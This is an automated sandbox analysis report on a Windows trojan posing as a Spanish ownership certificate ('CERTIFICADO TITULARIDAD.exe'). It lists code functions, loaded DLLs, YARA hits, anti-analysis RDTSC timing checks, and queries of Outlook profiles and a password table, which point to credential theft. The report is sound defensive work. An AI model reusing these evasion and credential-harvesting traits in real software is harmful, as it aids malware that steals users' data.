          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44EEB04_2_3A44EEB0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44E5504_2_3A44E550
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44B3504_2_3A44B350
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4413514_2_3A441351
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4413604_2_3A441360
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4433604_2_3A443360
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A449D704_2_3A449D70
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44CF704_2_3A44CF70
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4405084_2_3A440508
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44AD104_2_3A44AD10
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44DF104_2_3A44DF10
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44C9304_2_3A44C930
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4497304_2_3A449730
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44F1D04_2_3A44F1D0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4409D04_2_3A4409D0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A448DD04_2_3A448DD0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44BFD04_2_3A44BFD0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44DBF04_2_3A44DBF0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44A9F04_2_3A44A9F0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44B9904_2_3A44B990
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4487904_2_3A448790
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44EB904_2_3A44EB90
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44D5B04_2_3A44D5B0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A44A3B04_2_3A44A3B0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4409BF4_2_3A4409BF
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A481B504_2_3A481B50
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4830084_2_3A483008
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4836F04_2_3A4836F0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4814704_2_3A481470
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4829204_2_3A482920
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A480D884_2_3A480D88
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4822384_2_3A482238
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A481B3F4_2_3A481B3F
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4836E14_2_3A4836E1
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4814604_2_3A481460
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A480A104_2_3A480A10
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4829114_2_3A482911
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4809EA4_2_3A4809EA
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A482FF84_2_3A482FF8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A480D784_2_3A480D78
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4822294_2_3A482229
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4800404_2_3A480040
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A4800064_2_3A480006
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A5738C04_2_3A5738C0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A571A204_2_3A571A20
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A5791304_2_3A579130
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A5726384_2_3A572638
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: String function: 00402DAB appears 51 times
          Source: CERTIFICADO TITULARIDAD.exeStatic PE information: invalid certificate
          Source: CERTIFICADO TITULARIDAD.exe, 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefibroglia mult.exeDVarFileInfo$ vs CERTIFICADO TITULARIDAD.exe
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400246980.0000000036EC7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs CERTIFICADO TITULARIDAD.exe
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000000.2618988973.0000000000456000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefibroglia mult.exeDVarFileInfo$ vs CERTIFICADO TITULARIDAD.exe
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3379964437.0000000006AE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CERTIFICADO TITULARIDAD.exe
          Source: CERTIFICADO TITULARIDAD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004034FC
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_00404991 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404991
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeFile created: C:\Users\user\subprovinceJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeMutant created: NULL
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeFile created: C:\Users\user\AppData\Local\Temp\nsjCEE5.tmpJump to behavior
          Source: CERTIFICADO TITULARIDAD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037301000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.00000000372BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeFile read: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe "C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess created: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe "C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess created: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe "C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: CERTIFICADO TITULARIDAD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000004.00000002.3373397485.00000000017A2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2622546717.0000000004C52000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_73F71BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73F71BFF
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_73F730C0 push eax; ret 0_2_73F730EE
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_04BA5696 pushad ; ret 0_2_04BA569A
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_04BA6CF0 push ds; ret 0_2_04BA6D68
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_04BA8429 push eax; retf 0_2_04BA844A
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_04BA685E push AD1224ABh; retf 0_2_04BA6868
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_04BA83EE push eax; retf 0_2_04BA844A
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_04BA6D47 push ds; ret 0_2_04BA6D68
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000D9C30 push esp; retf 0018h4_2_000D9D55
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_016F6D47 push ds; ret 4_2_016F6D68
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_016F83EE push eax; retf 4_2_016F844A
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_016F685E push AD1224ABh; retf 4_2_016F6868
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_016F8429 push eax; retf 4_2_016F844A
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_016F6CF0 push ds; ret 4_2_016F6D68
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_016F5696 pushad ; ret 4_2_016F569A
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeFile created: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeAPI/Special instruction interceptor: Address: 5149F40
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeAPI/Special instruction interceptor: Address: 1C99F40
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeRDTSC instruction interceptor: First address: 5115242 second address: 5115242 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, FFFFFF8Fh 0x00000005 cmp ebx, ecx 0x00000007 jc 00007FDE6D3D4642h 0x00000009 test bx, dx 0x0000000c inc ebp 0x0000000d test ecx, ebx 0x0000000f inc ebx 0x00000010 rdtsc
